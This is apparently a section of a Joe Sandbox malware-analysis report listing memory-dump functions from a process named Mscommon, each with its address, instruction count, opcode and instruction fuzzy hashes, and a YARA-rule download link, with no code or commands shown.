Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f9c7baf03150796b8aeba76fda92b8d60fc8880d0826feddd0a6065dbe222e
Instruction ID: 3478710fde6dc5d500ee7e29d6a95dae85079d6e586f80ea45783ab9fbe81771
Opcode Fuzzy Hash: 23f9c7baf03150796b8aeba76fda92b8d60fc8880d0826feddd0a6065dbe222e
Instruction Fuzzy Hash: D7411B70A1891D8FDF94EF98C895AEDB7B1FF98714F00026AD409E7295DB34A941CB80

Function 00007FFD9C1B0181 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b12b6b729d180b85acdd828b9e67c5ff657bbe1f1aea39c2d98a83d605b365
Instruction ID: ef60cc7d120e803dfe24fc21e2d3545f25b0a17dd46cd65e047cabb5f5aeebf6
Opcode Fuzzy Hash: 63b12b6b729d180b85acdd828b9e67c5ff657bbe1f1aea39c2d98a83d605b365
Instruction Fuzzy Hash: 0C31923160C9498FDF6CEB18C465EA473E1FFA9310B0406BDD44ED7296DE25E885CB85

Function 00007FFD9C1B81CD Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3568e57ff310e157e8032a294b53345994b6333f39dc372bcb2f31c06b1c9b73
Instruction ID: 65e791bf9a2252ededc9c958568605d0857e00bfcc40fe09551ad80d667f624f
Opcode Fuzzy Hash: 3568e57ff310e157e8032a294b53345994b6333f39dc372bcb2f31c06b1c9b73
Instruction Fuzzy Hash: 4241D573E0CD4F8FFB64D6D888615BD7BB1FF54780F5401BAD05AA218ADE286402CB48

Function 00007FFD9C1BC111 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47167ce33c3a5dee4ddc8a73b0cf22b131b3e71ec40d0abadd2aa3ed1fdf8640
Instruction ID: 411b049c9929069006a9bdcf547fd7b19e5470d0536124a418adbe5c3c653c75
Opcode Fuzzy Hash: 47167ce33c3a5dee4ddc8a73b0cf22b131b3e71ec40d0abadd2aa3ed1fdf8640
Instruction Fuzzy Hash: C731A23170C9098FDF68EF18C4A9DA4B3E1FF7931070446AAD44ED7296CE21E895CB85

Function 00007FFD9C1B011B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dab141165c7570a6abec7ad3001e22e73792099371dc20d84f1d0d8cc7cb2d9e
Instruction ID: 30d79c0e34b1419d4e88875f43f698e4efdf06fad5e8101b5fabfbd82b72eb1b
Opcode Fuzzy Hash: dab141165c7570a6abec7ad3001e22e73792099371dc20d84f1d0d8cc7cb2d9e
Instruction Fuzzy Hash: 7131703170C9098FDF6CEB18C465EA573E1FBA9310B0406A9E04ED7296DE25E885CB85

Function 00007FFD9C1B81F4 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997423589a2c79fe4a2d49ecd7bfc4aef992e0c8d1e3d7fb04f8ecab8c2f76fd
Instruction ID: 015cf3895e0d8e1394b3deab55a3b437e0d9c8626cd86856213893cbe722c4b3
Opcode Fuzzy Hash: 997423589a2c79fe4a2d49ecd7bfc4aef992e0c8d1e3d7fb04f8ecab8c2f76fd
Instruction Fuzzy Hash: 8731D673E08D4F8FFB64D69C88615FC7BB0FF54780F5401BAE05AA618ADA286802CB44

Function 00007FFD9C1BC0AB Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ecd8352c6b5a0cf5f3db9b4cc9a09bfac383a8029dcd13979dfcfccb5986f54
Instruction ID: 32413f3996596ae920ce878bbb6c563719e755e6ad17bf5fc1fee39629f9ba20
Opcode Fuzzy Hash: 6ecd8352c6b5a0cf5f3db9b4cc9a09bfac383a8029dcd13979dfcfccb5986f54
Instruction Fuzzy Hash: 3631643170C9098FDF68EF18C4A9DA4B3E1FF7931070445AAD44ED7296CE25E895CB85

Function 00007FFD9C1B744A Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc07670cda68caea0e6f92167662a257acad9cbda51d015d1aeda01f40851fc
Instruction ID: 61679bdc803d7af0279ea2b4d406339bc30186624cdccbe00ee8ee72125df9b1
Opcode Fuzzy Hash: 8cc07670cda68caea0e6f92167662a257acad9cbda51d015d1aeda01f40851fc
Instruction Fuzzy Hash: 19311621A4E7C68FE3139374A8746E97F716F43365F1800FAE4C5CE4A3C6990419CBA6

Function 00007FFD9C1B926B Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6832078e344a535de5ef6d6318ea815febd91f0b994ee7a4805b09cf784e1eb9
Instruction ID: c962e8394a69b331b4f0e96799e55e1115acd6710bb80361938a6ea2583005bf
Opcode Fuzzy Hash: 6832078e344a535de5ef6d6318ea815febd91f0b994ee7a4805b09cf784e1eb9
Instruction Fuzzy Hash: ED314072F18A1B8FDB54EB68D4A15B8B7B2FF58350B108179D04AD3696CF34BC528B84

Function 00007FFD9C1B9325 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f6284f5e03f4e4243a72ae9ba9116e2cda2310d0fb4a6713f0789ab232beb7
Instruction ID: 22f9653e9601e63f18dad20f13c909c3586189e6706f22d93b6062bdedced464
Opcode Fuzzy Hash: d2f6284f5e03f4e4243a72ae9ba9116e2cda2310d0fb4a6713f0789ab232beb7
Instruction Fuzzy Hash: DD31F472F0CA474FEB6897B848722B8B7B1EF58390F58417AD05DD32D6DD1868028B84

Function 00007FFD9C1B88E5 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cfefe325c564a30af922db8b154d458e60472fe07840158c26d35e4905bc081
Instruction ID: 49629b24141ba7fac562bbe4c24d53f2ab7f6635700315617e2c65655847b92f
Opcode Fuzzy Hash: 9cfefe325c564a30af922db8b154d458e60472fe07840158c26d35e4905bc081
Instruction Fuzzy Hash: 22216132A1D69E8FEF65DB98C8605BC7BB1FF95740F04057AD00AE7296CA286805CB15

Function 00007FFD9BAD50F4 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd9b10958cfd0f9a7d3e8ec7c7d9bb20dade467696ee29963b35993329ad516c
Instruction ID: 38677ff9e10d47fcee9cb76651e01a34b23dc7b32cac0300a506163d8f686185
Opcode Fuzzy Hash: fd9b10958cfd0f9a7d3e8ec7c7d9bb20dade467696ee29963b35993329ad516c
Instruction Fuzzy Hash: 4F31A87491891C8FDBA8EB14C865AE9B7B0FB68305F1002EA900EE3295CB755B84CF41

Function 00007FFD9C1B8348 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a6360a7d7e0e3db7ed57ec6221d790601089e1793fcf713add7d2a5996d2a25
Instruction ID: ab3f3a1a7ac9fca5d9d63e3cb73002f7b5bcaa0a2f46363ba1860089318dbad4
Opcode Fuzzy Hash: 2a6360a7d7e0e3db7ed57ec6221d790601089e1793fcf713add7d2a5996d2a25
Instruction Fuzzy Hash: 6D113A13A0DA870BE72A57B858711E43FB2EF85280F0881BBE489C71DBDD1DE8058785

Function 00007FFD9C1BADD1 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81906f9a73e73c5fb9cbbaf6606f01744323a1e93f755d2c709a724240924244
Instruction ID: eac4072a07962a34aa2ac305ea0772a8c7d51ebd0a7cbb55bcdc5e5a6739a496
Opcode Fuzzy Hash: 81906f9a73e73c5fb9cbbaf6606f01744323a1e93f755d2c709a724240924244
Instruction Fuzzy Hash: DD315B22A1C1A74AF33A835844B85747B71EF8635071C46BAE097DB5CFC83CBA81CB55

Function 00007FFD9C1BBEE5 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b92d4b81940041826ab10af8bd9606840878017ef7ccf0166db97e6fc3c1b0
Instruction ID: d80145c35868dbf78ab7e7ea2713c4d30496a05bf7c329470465e728d6a94617
Opcode Fuzzy Hash: d6b92d4b81940041826ab10af8bd9606840878017ef7ccf0166db97e6fc3c1b0
Instruction Fuzzy Hash: FA310932A1890FCFEB68DB9484A55BD77B0FF44340F5040BAD40EE29D9DB38A9808F45

Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7fe619a6a2d70a4eb0647356edbb151d97b861f054bf4098ee4aff94ab5b87
Instruction ID: 126f954ff7c9917621ab037d130cde3871d79eb6cfd189bef6a35e5a044393b6
Opcode Fuzzy Hash: 4a7fe619a6a2d70a4eb0647356edbb151d97b861f054bf4098ee4aff94ab5b87
Instruction Fuzzy Hash: 85213736B0E28D4FE7229BA8DC312ED7760EFC2721F464673C054971E2D678260AC795

Function 00007FFD9C1B8CC2 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a5baf690e359625768e952f51da75df26f8aae53b95bc8b6d65f8eed908b10a
Instruction ID: 66fade9081cd848aa7570fc8638d226a322bedfeaa57db860bdb92d089370cb9
Opcode Fuzzy Hash: 4a5baf690e359625768e952f51da75df26f8aae53b95bc8b6d65f8eed908b10a
Instruction Fuzzy Hash: 3B21D971A0491D8FDFA8DB58C465AE8B7B1FF6C310F0041AED44EE3295CE35A9818F04

Function 00007FFD9C1BD992 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44cebd39ce7c9ca5de6bc6fda35d8794f395e8bca776fc1b459bcbe1b5d49654
Instruction ID: df7646a007026ad5f0c1eff53313105744664e513cc50c572723e78b82f2470b
Opcode Fuzzy Hash: 44cebd39ce7c9ca5de6bc6fda35d8794f395e8bca776fc1b459bcbe1b5d49654
Instruction Fuzzy Hash: 6921D831A1891D8FEFACEB58C465AA9B7B1FF58310F4041BED04EE3295CA35A9818F44

Function 00007FFD9BAD119D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e055614d40727d5b916d15a0305f9f6d8597913c3e21ab7851ae810a0f97ce
Instruction ID: c6aee7c0bdc55ad0b373c9c9867de72ea8147670bdb7de11c105bdfd49da7d74
Opcode Fuzzy Hash: 39e055614d40727d5b916d15a0305f9f6d8597913c3e21ab7851ae810a0f97ce
Instruction Fuzzy Hash: 4A210E31A1491E8FEB94EBA8C8949AD77F1FF68300B11467AE41DD72A1DF74A941CB40

Function 00007FFD9C1BEAF5 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 624ae82f624afc3f13318119966fa5964f3464e126c35902c1977af2ce577888
Instruction ID: 9cf00d5da14452c693764339b585a519222cb852f234f56503ee57a6c596a42a
Opcode Fuzzy Hash: 624ae82f624afc3f13318119966fa5964f3464e126c35902c1977af2ce577888
Instruction Fuzzy Hash: 8311D572F09A5B4FDB64E6A894752E87BB0EF59390F14007AD049E3397DE2858028B44

Function 00007FFD9C1BC4D8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b320a54145293e82f75ca5f9ef9950582171e097ab294af642fef792148c2e55
Instruction ID: 92d76a0083d1cd0d7c2a28395a55d283aa4b415e9dd0c7d469513fbb9a9d4194
Opcode Fuzzy Hash: b320a54145293e82f75ca5f9ef9950582171e097ab294af642fef792148c2e55
Instruction Fuzzy Hash: 40212B11B5C4378AF638AA44C0745B8B671FFD0351F944676F49BDB4EAD92CB8C29388

Function 00007FFD9C1BC560 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed157f7e1940efce6cd9eca92256248f5449306f2a3c1ebbbe0d0d3e4b3879c6
Instruction ID: bbcfd2d3818528245470744fe856e6de4ba7e05f4d34aa04c3715fb798e7c776
Opcode Fuzzy Hash: ed157f7e1940efce6cd9eca92256248f5449306f2a3c1ebbbe0d0d3e4b3879c6
Instruction Fuzzy Hash: 9F11E732B08A0F4FE7B0A69848685B93BF1DF593D0F000576D40EE72D9DD6868058A44

Function 00007FFD9C1B89C1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3d228b456f0958fcc7279b55022e841f1f94cf190da65ee8af3dcc3336bea44
Instruction ID: b7985e0bce0db36f3948cac848ea79c7f1386ed8b8c0810c96cf76e5573effbf
Opcode Fuzzy Hash: b3d228b456f0958fcc7279b55022e841f1f94cf190da65ee8af3dcc3336bea44
Instruction Fuzzy Hash: EF11E213F0D29387F63912F818720BC66305F84BE0F1802B7D44EA62CACC4C38551B9E

Function 00007FFD9C1BEA52 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92f1383fe5219830c3f04f6ca8fb3bebdd2c3a7c9b45d285b4f535596ae049e
Instruction ID: 6c7b0947c78c1ef5efc52ce79de2ddbf5192008481929cea8b8874c0993b3643
Opcode Fuzzy Hash: c92f1383fe5219830c3f04f6ca8fb3bebdd2c3a7c9b45d285b4f535596ae049e
Instruction Fuzzy Hash: 34117732F1D91A9FDB64EA98D4A15B8F3E1FF59750B14417AD00EE3686CE24BC11CB84

Function 00007FFD9BAD90A2 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d3cbb68b616acbba781cd1cfb374d371dc6d34f43ab149395b09a5892f768a
Instruction ID: bdbd7ae3c0e9b347a922a3d12957731a27f8186d0aeca98556c9f730a9cd05b2
Opcode Fuzzy Hash: 88d3cbb68b616acbba781cd1cfb374d371dc6d34f43ab149395b09a5892f768a
Instruction Fuzzy Hash: AF21A970A1956D8EEB64EB54C8647ECB6B1EF94345F0542FA900DE62A1DB745B81CF00

Function 00007FFD9BAD9014 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519d0b8c653c9cf4c68ebf1e2811e4d7cfef65f9f826a2c1f7430f8a418ea4ec
Instruction ID: be87fd6c904128c6aa2544e8b27a9d90ec6ae1196e720cdc4f6ada2071a1cf92
Opcode Fuzzy Hash: 519d0b8c653c9cf4c68ebf1e2811e4d7cfef65f9f826a2c1f7430f8a418ea4ec
Instruction Fuzzy Hash: 4821AA70D1956D8EEBA4EB54C8A4BEDB6B1EB58315F1046FAC00DA2291DFB46BC4CF04

Function 00007FFD9BAD0C38 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a721b2449a753f99a71c75c82cbddb002971f8748882129ce6e5e4e53706d468
Instruction ID: 45c5d39da149e01b327cf4477147f1440b6ea104e2e2c22effc088dde53aa5a9
Opcode Fuzzy Hash: a721b2449a753f99a71c75c82cbddb002971f8748882129ce6e5e4e53706d468
Instruction Fuzzy Hash: DB11E632B0E68D4EE7229BA8C8712E97770EF82711F454673D0549B1E2DA782606C795

Function 00007FFD9BAD8E94 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 647f8d62088259e5bf7a649de46c5bad6b6b6530dc2fd2215ba9de87b9124001
Instruction ID: 8fb29febc9cab6cc7824627cc0108cdb425608b19d92e4ea6593cc6198a1f399
Opcode Fuzzy Hash: 647f8d62088259e5bf7a649de46c5bad6b6b6530dc2fd2215ba9de87b9124001
Instruction Fuzzy Hash: 8F212F31E1E55D8EEBB4DB54C8646FC72B1AB94755F1142BAC00DA22A1DFB86B84CF00

Function 00007FFD9C1B9E80 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c22f8fae7684bb508693409656a5c9551bb006e2f64eb997aad62e89a5cdd8d
Instruction ID: dbc6b91f63f53140f49ab76b74cd6b5904bef38392e6310077f6aaa1fda0b8a5
Opcode Fuzzy Hash: 1c22f8fae7684bb508693409656a5c9551bb006e2f64eb997aad62e89a5cdd8d
Instruction Fuzzy Hash: DB11C132F08A0B8BDB64EA6484615F977B1EF58395F40067AE44EC75C6CE28B8068A90

Function 00007FFD9C1BF620 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3ac250b37ae0b29958dadd5c5109801a93b50e73b99d69d86e89bb99b157e5e
Instruction ID: 8a2f6c1eac3e4b885cdf205a847d22a4e5849498a2e263516fd9e3757e67deda
Opcode Fuzzy Hash: c3ac250b37ae0b29958dadd5c5109801a93b50e73b99d69d86e89bb99b157e5e
Instruction Fuzzy Hash: 50119132F08A0B8FDB65EB6484719F577E1EF58394B00067AE44EC75D6DE28A8458A90

Function 00007FFD9C1B9CFE Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 340d39a569ea30934b03949e6b5e1371ccca4db4acbc9b4e94b75c425e0397f6
Instruction ID: 4467a420843c686ac25618fdf3398d1b18e0c30d1c3c1f1a923453970f7c26b0
Opcode Fuzzy Hash: 340d39a569ea30934b03949e6b5e1371ccca4db4acbc9b4e94b75c425e0397f6
Instruction Fuzzy Hash: 91116632B0850B8FEB19AE48D4602F433B0EF59391F20457BE909C72C1CF38A851CB80

Function 00007FFD9C1BE939 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d621457055fa7e4151b19d5fffbd006f221a1ed8dea743936fad387845a668c
Instruction ID: cf4a325af52171e3d3a46d078f1fec2790e4fff87e66f41d61ea5752c6331abd
Opcode Fuzzy Hash: 6d621457055fa7e4151b19d5fffbd006f221a1ed8dea743936fad387845a668c
Instruction Fuzzy Hash: 61010432A0DA4B0FE7F0D69848686E93BF1EF59390F040077E009E7296DD6858468755

Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2035640685.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9bad0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 547627d62c14ed8bd6b41b75e82de44a35a2a252b7be96b27a5e5f45243a5a5d
Instruction ID: 2ae30314883d42f09278e294cc8917319d93ed3d4c8b9afca4590f33b9211e8d
Opcode Fuzzy Hash: 547627d62c14ed8bd6b41b75e82de44a35a2a252b7be96b27a5e5f45243a5a5d
Instruction Fuzzy Hash: 14110632A0E68D4FE7229BA4C8702EE7770EF82711F054673D055DB1E2CA782609CB55

Function 00007FFD9C1BF49E Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7323c39d12af94a88d8e7934101b436ccd766a49de5df62ed6cf3543dd57d0
Instruction ID: 41930ebae5ff8b5592e9c41d2db9c525273313a6d6f9d7cf1928d1ac72be2e01
Opcode Fuzzy Hash: 0d7323c39d12af94a88d8e7934101b436ccd766a49de5df62ed6cf3543dd57d0
Instruction Fuzzy Hash: 72118932F085078FEB14AE58C4646F433A0EF29395F20057BE90DC72D1CE29A840CB80

Function 00007FFD9C1B31B8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2044031119.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9c1b0000_Mscommon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f4d12f9c38f50a78efbf9d642ea3268182eda54e50e619ae68a614afb7e2479
Instruction ID: a8cad4e19c54e4dd5beeef465341215f57da071e77970ad1bd966f19a3683c7a
Opcode Fuzzy Hash: 1f4d12f9c38f50a78efbf9d642ea3268182eda54e50e619ae68a614afb7e2479
Instruction Fuzzy Hash: 5901D632F08A4B0BEB7456A844582BD3AF1DF5A390F1401B6E00DF7295DD686C068758

Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

